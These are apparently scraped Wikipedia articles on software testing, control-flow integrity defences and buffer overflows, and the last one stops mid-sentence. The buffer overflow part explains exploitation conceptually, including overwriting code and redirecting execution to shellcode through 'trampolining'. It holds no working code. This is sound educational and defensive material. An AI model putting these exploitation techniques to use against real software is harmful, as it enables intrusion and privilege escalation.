Software testingis the act of checking whethersoftwaresatisfies expectations. Software testing can provide objective, independent information about thequalityof software and theriskof its failure to auseror sponsor.[1] Software testing can determine thecorrectnessof software for specificscenariosbut cannot determine correctness for all scenarios.[2][3]It cannot find allbugs. Based on the criteria for measuring correctness from anoracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles includespecifications,contracts,[4]comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws. Software testing is often dynamic in nature; running the software to verify actual output matches expected. It can also be static in nature; reviewingcodeand its associateddocumentation. Software testing is often used to answer the question: Does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed.[5]: 41–43 Software testing should follow a "pyramid" approach wherein most of your tests should beunit tests, followed byintegration testsand finallyend-to-end (e2e) testsshould have the lowest proportion.[6][7][8] A study conducted byNISTin 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing was performed.[9][dubious–discuss] Outsourcingsoftware testing because of costs is very common, with China, the Philippines, and India being preferred destinations.[citation needed] Glenford J. Myersinitially introduced the separation ofdebuggingfrom testing in 1979.[10]Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."[10]: 16), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from that of verification. Software testing is typically goal driven. Software testing typically includes handling software bugs – a defect in thecodethat causes an undesirable result.[11]: 31Bugs generally slow testing progress and involveprogrammerassistance todebugand fix. Not all defects cause a failure. For example, a defect indead codewill not be considered a failure. A defect that does not cause failure at one point in time may lead to failure later due to environmental changes. Examples of environment change include running on newcomputer hardware, changes indata, and interacting with different software.[12] A single defect may result in multiple failure symptoms. Software testing may involve a Requirements gap – omission from the design for a requirement.[5]: 426Requirement gaps can often benon-functional requirementssuch astestability,scalability,maintainability,performance, andsecurity. A fundamental limitation of software testing is that testing underallcombinations of inputs and preconditions (initial state) is not feasible, even with a simple product.[3]: 17–18[13]Defects that manifest in unusual conditions are difficult to find in testing. Also,non-functionaldimensions of quality (how it is supposed tobeversus what it is supposed todo) –usability,scalability,performance,compatibility, andreliability– can be subjective; something that constitutes sufficient value to one person may not to another. Although testing for every possible input is not feasible, testing can usecombinatoricsto maximize coverage while minimizing tests.[14] Testing can be categorized many ways.[15] Software testing can be categorized into levels based on how much of thesoftware systemis the focus of a test.[18][19][20][21] There are many approaches to software testing.Reviews,walkthroughs, orinspectionsare referred to as static testing, whereas executing programmed code with a given set oftest casesis referred to asdynamic testing.[23][24] Static testing is often implicit, like proofreading, plus when programming tools/text editors check source code structure or compilers (pre-compilers) check syntax and data flow asstatic program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code and are applied to discretefunctionsor modules.[23][24]Typical techniques for these are either usingstubs/drivers or execution from adebuggerenvironment.[24] Static testing involvesverification, whereas dynamic testing also involvesvalidation.[24] Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kind of decisions.[25]This is related to offlineruntime verificationandlog analysis. The type of testing strategy to be performed depends on whether the tests to be applied to the IUT should be decided before the testing plan starts to be executed (preset testing[28]) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing[29][30]). Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box that includes aspects of both boxes may also be applied to software testing methodology.[31][32] White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs.[31][32]This is analogous to testing nodes in a circuit, e.g.,in-circuit testing(ICT). While white-box testing can be applied at theunit,integration, andsystemlevels of the software testing process, it is usually done at the unit level.[33]It can test paths within a unit, paths between units during integration, and between subsystems during a system–level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements. Techniques used in white-box testing include:[32][34] Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. This allows the software team to examine parts of a system that are rarely tested and ensures that the most importantfunction pointshave been tested.[35]Code coverage as asoftware metriccan be reported as a percentage for:[31][35][36] 100% statement coverage ensures that all code paths or branches (in terms ofcontrol flow) are executed at least once. This is helpful in ensuring correct functionality, but not sufficient since the same code may process different inputs correctly or incorrectly.[37] Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it.[38]Black-box testing methods include:equivalence partitioning,boundary value analysis,all-pairs testing,state transition tables,decision tabletesting,fuzz testing,model-based testing,use casetesting,exploratory testing, and specification-based testing.[31][32][36] Specification-based testing aims to test the functionality of software according to the applicable requirements.[39]This level of testing usually requires thoroughtest casesto be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can befunctionalornon-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[40] Black box testing can be used to any level of testing although usually not at the unit level.[33] Component interface testing Component interface testing is a variation ofblack-box testing, with the focus on the data values beyond just the related actions of a subsystem component.[41]The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units.[42][43]The data being passed can be considered as "message packets" and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values.[42]Unusual data values in an interface can help explain unexpected performance in the next unit. The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly.[44][45] At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testingandexploratory testingare important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly.[46]In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes.[46]However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability.[46] Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary."[47]Grey-box testing may also includereverse engineering(using dynamic code analysis) to determine, for instance, boundary values or error messages.[47]Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conductingintegration testingbetween two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding adatabase. The tester can observe the state of the product being tested after performing certain actions such as executingSQLstatements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling,exception handling, and so on.[48] With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat.[33] Most software systems have installation procedures that are needed before they can be used for their main purpose. Testing these procedures to achieve an installed software system that may be used is known asinstallation testing.[49]: 139These procedures may involve full or partial upgrades, and install/uninstall processes. A common cause of software failure (real or perceived) is a lack of itscompatibilitywith otherapplication software,operating systems(or operating systemversions, old or new), or target environments that differ greatly from the original (such as aterminalorGUIapplication intended to be run on thedesktopnow being required to become aWeb application, which must render in aWeb browser). For example, in the case of a lack ofbackward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactivelyabstractingoperating system functionality into a separate programmoduleorlibrary. Sanity testingdetermines whether it is reasonable to proceed with further testing. Smoke testingconsists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used asbuild verification test. Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncoversoftware regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as anunintended consequenceof program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development,[50]due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and theriskof the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing is system-level testing to ensure the software meets customer expectations.[51][52][53][54] Acceptance testing may be performed as part of the hand-off process between any two phases of development.[citation needed] Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test.[54] Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of aquality management system. OAT is a common type of non-functional software testing, used mainly insoftware developmentandsoftware maintenanceprojects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. Hence, it is also known as operational readiness testing (ORT) oroperations readiness and assurance(OR&A) testing.Functional testingwithin OAT is limited to those tests that are required to verify thenon-functionalaspects of the system. In addition, the software testing should ensure that the portability of the system, as well as working as expected, does not also damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative.[55] Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the relevant regulations to the software product. Both of these two tests can be performed by users or independent testers. Regulation acceptance testing sometimes involves the regulatory agencies auditing the test results.[54] Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing.[56] Beta testing comes after alpha testing and can be considered a form of externaluser acceptance testing. Versions of the software, known asbeta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults orbugs. Beta versions can be made available to the open public to increase thefeedbackfield to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta).[57] Functional testingrefers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testingrefers to aspects of the software that may not be related to a specific function or user action, such asscalabilityor otherperformance, behavior under certainconstraints, orsecurity. Testing will determine the breaking point, the point at which extremes of scalability or performance leads to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing is the process of executingautomated testsas part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate.[58][59]Continuous testing includes the validation of bothfunctional requirementsandnon-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals.[60][61] Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing therobustnessof input validation and error-management routines.[citation needed]Software fault injection, in the form offuzzing, is an example of failure testing. Various commercial non-functional testing tools are linked from thesoftware fault injectionpage; there are also numerous open-source and free software tools available that perform destructive testing. Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testingis primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number ofusers. This is generally referred to as softwarescalability. The related load testing activity of when performed as a non-functional activity is often referred to asendurance testing.Volume testingis a way to test software functions even when certain components (for example a file or database) increase radically in size.Stress testingis a way to test reliability under unexpected or rare workloads.Stability testing(often referred to as load or endurance testing) checks to see if the software can continuously function well in or above an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing,scalability testing, and volume testing, are often used interchangeably. Real-time softwaresystems have strict timing constraints. To test if timing constraints are met,real-time testingis used. Usability testingis to check if the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, being monitored by skilledUI designers. Usability testing can use structured models to check how well an interface works. The Stanton, Theofanos, and Joshi (2015) model looks at user experience, and the Al-Sharafat and Qadoumi (2016) model is for expert evaluation, helping to assess usability in digital applications.[62] Accessibilitytesting is done to ensure that the software is accessible to persons with disabilities. Some of the common web accessibility tests are Security testingis essential for software that processes confidential data to preventsystem intrusionbyhackers. The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them."[63] Testing forinternationalization and localizationvalidates that the software can be used with different languages and geographic regions. The process ofpseudolocalizationis used to test the ability of an application to be translated to another language, and make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones.[64] Actual translation to human languages must be tested, too. Possible localization and globalization failures include: Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might includestatic code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis,traceability, and other software testing practices. A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment) and data is collected to determine which version is better at achieving the desired outcome. Concurrent or concurrency testing assesses the behaviour and performance of software and systems that useconcurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Creating a display expected output, whether asdata comparisonof text or screenshots of the UI,[3]: 195is sometimes called snapshot testing or Golden Master Testing unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell libraryQuickCheck.[65] Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases or to determine whether the actual outputs agree with the expected outcomes. VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control. It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby libraryvcr. In an organization, testers may be in a separate team from the rest of thesoftware developmentteam or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. In the 1980s, the termsoftware testerstarted to be used to denote a separate profession. Notable software testing roles and titles include:[66]test manager,test lead,test analyst,test designer,tester,automation developer, andtest administrator.[67] Organizations that develop software, perform testing differently, but there are common patterns.[2] Inwaterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer.[68]This practice often results in the testing phase being used as aprojectbuffer to compensate for project delays, thereby compromising the time devoted to testing.[10]: 145–146 Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes.[69] Agile software developmentcommonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice,test-driven software development(TDD), is a way ofunit testingsuch that unit-level testing is performed while writing the product code.[70]Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of thiscontinuous integrationis to support development and reduce defects.[71][70] Even in organizations that separate teams by programming and testing functions, many often have the programmers performunit testing.[72] The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Software testing is used in association withverification and validation:[73] The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to theIEEE StandardGlossary of Software Engineering Terminology:[11]: 80–81 And, according to the ISO 9000 standard: The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. In some organizations, software testing is part of asoftware quality assurance(SQA) process.[3]: 347In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change thesoftware engineeringprocess itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies.[citation needed] Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Quality measures include such topics ascorrectness, completeness,securityandISO/IEC 9126requirements such as capability,reliability,efficiency,portability,maintainability, compatibility, andusability. There are a number of frequently usedsoftware metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. A software testing process can produce severalartifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Atest planis a document detailing the approach that will be taken for intended test activities. The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans.[51]The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan).[51]A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Atest casenormally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result.[75]This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Atest scriptis a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. The software, tools, samples of data input and output, and configurations are all referred to collectively as atest harness. A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in thecontroversysection. Some of the majorsoftware testing controversiesinclude: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. The following table shows the cost of fixing the defect depending on the stage it was found.[85]For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of moderncontinuous deploymentpractices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.[86]
https://en.wikipedia.org/wiki/Software_testing#Limitations_of_testing
Control-flow integrity(CFI) is a general term forcomputer securitytechniques that prevent a wide variety ofmalwareattacks from redirecting the flow of execution (thecontrol flow) of a program. A computer program commonly changes its control flow to make decisions and use different parts of the code. Such transfers may bedirect, in that the target address is written in the code itself, orindirect, in that the target address itself is a variable in memory or a CPU register. In a typical function call, the program performs a direct call, but returns to the caller function using the stack – an indirectbackward-edgetransfer. When afunction pointeris called, such as from avirtual table, we say there is an indirectforward-edgetransfer.[1][2] Attackers seek to inject code into a program to make use of its privileges or to extract data from its memory space. Before executable code was commonly made read-only, an attacker could arbitrarily change the code as it is run, targeting direct transfers or even do with no transfers at all. AfterW^Xbecame widespread, an attacker wants to instead redirect execution to a separate, unprotected area containing the code to be run, making use of indirect transfers: one could overwrite the virtual table for a forward-edge attack or change the call stack for a backward-edge attack (return-oriented programming). CFI is designed to protect indirect transfers from going to unintended locations.[1] Associated techniques include code-pointer separation (CPS), code-pointer integrity (CPI),stack canaries,shadow stacks, andvtablepointer verification.[3][4][5]These protections can be classified into eithercoarse-grainedorfine-grainedbased on the number of targets restricted. A coarse-grained forward-edge CFI implementation, could, for example, restrict the set of indirect call targets to any function that may be indirectly called in the program, while a fine-grained one would restrict each indirect call site to functions that have the same type as the function to be called. Similarly, for a backward edge scheme protecting returns, a coarse-grained implementation would only allow the procedure to return to a function of the same type (of which there could be many, especially for common prototypes), while a fine-grained one would enforce precise return matching (so it can return only to the function that called it). Related implementations are available inClang(LLVM in general),[6]Microsoft's Control Flow Guard[7][8][9]and Return Flow Guard,[10]Google's Indirect Function-Call Checks[11]and Reuse Attack Protector (RAP).[12][13] LLVM/Clang provides a "CFI" option that works in the forward edge by checking for errors invirtual tablesand type casts. It depends onlink-time optimization(LTO) to know what functions are supposed to be called in normal cases.[14]There is a separate "shadow call stack" scheme that defends on the backward edge by checking for call stack modifications, available only for aarch64.[15] Google has shippedAndroidwith theLinux kernelcompiled by Clang withlink-time optimization(LTO) and CFI since 2018.[16]SCS is available for Linux kernel as an option, including on Android.[17] Intel Control-flow Enforcement Technology (CET) detects compromises to control flow integrity with ashadow stack(SS) andindirect branch tracking(IBT).[18][19] The kernel must map a region of memory for the shadow stack not writable to user space programs except by special instructions. The shadow stack stores a copy of the return address of each CALL. On a RET, the processor checks if the return address stored in the normal stack and shadow stack are equal. If the addresses are not equal, the processor generates an INT #21 (Control Flow Protection Fault). Indirect branch tracking detects indirect JMP or CALL instructions to unauthorized targets. It is implemented by adding a new internal state machine in the processor. The behavior of indirect JMP and CALL instructions is changed so that they switch the state machine from IDLE to WAIT_FOR_ENDBRANCH. In the WAIT_FOR_ENDBRANCH state, the next instruction to be executed is required to be the new ENDBRANCH instruction (ENDBR32 in 32-bit mode or ENDBR64 in 64-bit mode), which changes the internal state machine from WAIT_FOR_ENDBRANCH back to IDLE. Thus every authorized target of an indirect JMP or CALL must begin with ENDBRANCH. If the processor is in a WAIT_FOR_ENDBRANCH state (meaning, the previous instruction was an indirect JMP or CALL), and the next instruction is not an ENDBRANCH instruction, the processor generates an INT #21 (Control Flow Protection Fault). On processors not supporting CET indirect branch tracking, ENDBRANCH instructions are interpreted as NOPs and have no effect. Control Flow Guard (CFG) was first released forWindows 8.1Update 3 (KB3000850) in November 2014. Developers can add CFG to their programs by adding the/guard:cflinker flag before program linking in Visual Studio 2015 or newer.[20] As ofWindows 10 Creators Update(Windows 10 version 1703), the Windows kernel is compiled with CFG.[21]The Windows kernel usesHyper-Vto prevent malicious kernel code from overwriting the CFG bitmap.[22] CFG operates by creating a per-processbitmap, where a set bit indicates that the address is a valid destination. Before performing each indirect function call, the application checks if the destination address is in the bitmap. If the destination address is not in the bitmap, the program terminates.[20]This makes it more difficult for an attacker to exploit ause-after-freeby replacing an object's contents and then using an indirect function call to execute a payload.[23] For all protected indirect function calls, the_guard_check_icallfunction is called, which performs the following steps:[24] There are several generic techniques for bypassing CFG: eXtended Flow Guard (XFG) has not been officially released yet, but is available in the Windows Insider preview and was publicly presented at Bluehat Shanghai in 2019.[29] XFG extends CFG by validating function call signatures to ensure that indirect function calls are only to the subset of functions with the same signature. Function call signature validation is implemented by adding instructions to store the target function's hash in register r10 immediately prior to the indirect call and storing the calculated function hash in the memory immediately preceding the target address's code. When the indirect call is made, the XFG validation function compares the value in r10 to the target function's stored hash.[30][31]
https://en.wikipedia.org/wiki/Control-flow_integrity
Inprogrammingandinformation security, abuffer overfloworbuffer overrunis ananomalywhereby aprogramwritesdatato abufferbeyond the buffer'sallocated memory, overwriting adjacentmemorylocations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, includingmemory access errors, incorrect results, andcrashes. Exploiting the behavior of a buffer overflow is a well-knownsecurity exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to holdexecutable codeand replace it withmalicious code, or to selectively overwrite data pertaining to the program's state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread inoperating system(OS) code, so it is possible to make attacks that performprivilege escalationand gain unlimited access to the computer's resources. The famedMorris wormin 1988 used this as one of its attack techniques. Programming languagescommonly associated with buffer overflows includeCandC++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to anarray(the built-in buffer type) is within the boundaries of that array.Bounds checkingcan prevent buffer overflows, but requires additional code and processing time. Modern operating systems use a variety of techniques to combat malicious buffer overflows, notably byrandomizing the layout of memory, or deliberately leaving space between buffers and looking for actions that write into those areas ("canaries"). A buffer overflow occurs whendatawritten to a buffer also corrupts data values inmemory addressesadjacent to the destination buffer due to insufficientbounds checking.[1]: 41This can occur when copying data from one buffer to another without first checking that the data fits within the destination buffer. In the following example expressed inC, a program has two variables which are adjacent in memory: an 8-byte-long string buffer, A, and a two-bytebig-endianinteger, B. Initially, A contains nothing but zero bytes, and B contains the number 1979. Now, the program attempts to store thenull-terminated string"excessive"withASCIIencoding in the A buffer. "excessive"is 9 characters long and encodes to 10 bytes including the null terminator, but A can take only 8 bytes. By failing to check the length of the string, it also overwrites the value of B: B's value has now been inadvertently replaced by a number formed from part of the character string. In this example "e" followed by a zero byte would become 25856. Writing data past the end of allocated memory can sometimes be detected by the operating system to generate asegmentation faulterror that terminates the process. To prevent the buffer overflow from happening in this example, the call tostrcpycould be replaced withstrlcpy, which takes the maximum capacity of A (including a null-termination character) as an additional parameter and ensures that no more than this amount of data is written to A: When available, thestrlcpylibrary function is preferred overstrncpywhich does not null-terminate the destination buffer if the source string's length is greater than or equal to the size of the buffer (the third argument passed to the function). ThereforeAmay not be null-terminated and cannot be treated as a valid C-style string. The techniques toexploita buffer overflow vulnerability vary byarchitecture,operating system, and memory region. For example, exploitation on theheap(used for dynamically allocated memory), differs markedly from exploitation on thecall stack. In general, heap exploitation depends on the heap manager used on the target system, while stack exploitation depends on the calling convention used by the architecture and compiler. There are several ways in which one can manipulate a program by exploiting stack-based buffer overflows: The attacker designs data to cause one of these exploits, then places this data in a buffer supplied to users by the vulnerable code. If the address of the user-supplied data used to affect the stack buffer overflow is unpredictable, exploiting a stack buffer overflow to cause remote code execution becomes much more difficult. One technique that can be used to exploit such a buffer overflow is called "trampolining". Here, an attacker will find a pointer to the vulnerable stack buffer and compute the location of theirshellcoderelative to that pointer. The attacker will then use the overwrite to jump to aninstructionalready in memory which will make a second jump, this time relative to the pointer. That second jump will branch execution into the shellcode. Suitable instructions are often present in large code. TheMetasploit Project, for example, maintains a database of suitable opcodes, though it lists only those found in theWindowsoperating 